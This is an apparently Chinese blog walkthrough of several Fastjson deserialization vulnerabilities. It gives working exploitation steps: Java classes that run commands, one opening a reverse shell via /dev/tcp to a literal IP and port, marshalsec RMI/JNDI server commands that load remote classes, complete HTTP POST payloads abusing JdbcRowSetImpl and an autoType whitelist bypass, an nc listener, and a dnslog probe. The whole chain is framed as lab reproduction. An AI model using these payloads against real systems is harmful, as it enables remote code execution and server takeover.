赞
踩
Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。
Fastjson<1.2.24远程代码执行(CNVD-2017-02833 )
Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238)
漏洞详情
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
漏洞版本
fastjson <=1.2.24
漏洞分析
漏洞利用
1、访问存在漏洞的页面,得到json格式的数据。
2、创建TouchFile.java文件,内容如下:
// javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"touch", "/tmp/success"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } }
3、执行编译命令javac TouchFile.java,得到TouchFile.class文件。并将其通过python3 -m http.server命令放到外网环境中,默认监听端口8000。
4、然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://xx.xx.xx.xx:8000/#TouchFile" 9999
5、在漏洞页面bp抓包后post提交数据,替换如下payload:
POST / HTTP/1.1 Host: 靶机ip:端口 Accept: */* Accept-Language: zh-CN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE) Connection: close Content-Length: 165 Content-Type: application/json Accept-Encoding: gzip, deflate { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://xx.xx.xx.xx:9999/TouchFile", "autoCommit":true } }
6、靶机执行命令成功
漏洞详情
fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
影响版本
fastjson <1.2.48
漏洞分析
https://www.anquanke.com/post/id/181874
漏洞利用
1、编写一个反弹shell脚本Exploit.java,并编译生成Exploit.class。
public class Exploit {
public Exploit(){
try{
Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/98.126.219.155/58274 0>&1");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}
2、然后将编译好的上传到服务器,利用python3 -m http.server 开启http服务。然后能够访问即可:
3、借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://39.108.118.128:8000/#Exploit" 9999
4、接着开启nc监听端口4444:nc -lvvp 4444
5、向靶场服务器发送Payload:
POST / HTTP/1.1 Host: xx.xx.xx.xx:8090 Accept: */* Accept-Language: zh-CN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE) Connection: close Content-Length: 165 Content-Type: application/json Accept-Encoding: gzip, deflate { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://xx.xx.xx.xx:9999/Exploit", "autoCommit":true } }
6、反弹成功
漏洞描述
Fastjson多个版本存在远程拒绝服务漏洞,Fastjson 1.2.60版本以下存在字符串解析异常,可导致远程拒绝服务攻击。攻击者即可通过精心构造的请求包对使用Fastjson的服务器造成远程拒绝服务攻击,可导致服务器宕机。
漏洞分析
无
影响版本
fastjson <1.2.60
fastjson sec版本>=sec06
漏洞利用
无
漏洞详情
FastJSON <= 1.2.68 存在远程代码执行漏洞,可直接获取到服务器权限。漏洞成因是Fastjson autotype开关的限制可被绕过,然后链式地反序列化某些原本不能被反序列化的有安全风险的类。
影响版本
FastJSON <= 1.2.68
漏洞分析
https://www.cnblogs.com/tr1ple/p/12348886.html
https://www.cnblogs.com/ph4nt0mer/p/13065373.html
漏洞利用
暂无
如果有报错回显,可以故意构造不完整json请求,返回的数据包会进行报错。
发送内容最后少了个括号导致数据包不完整从而报错,从返回的数据包中可以看到有fastjson字样。
如果没有报错回显,利用dnslog进行回显
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog的地址"}}
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。
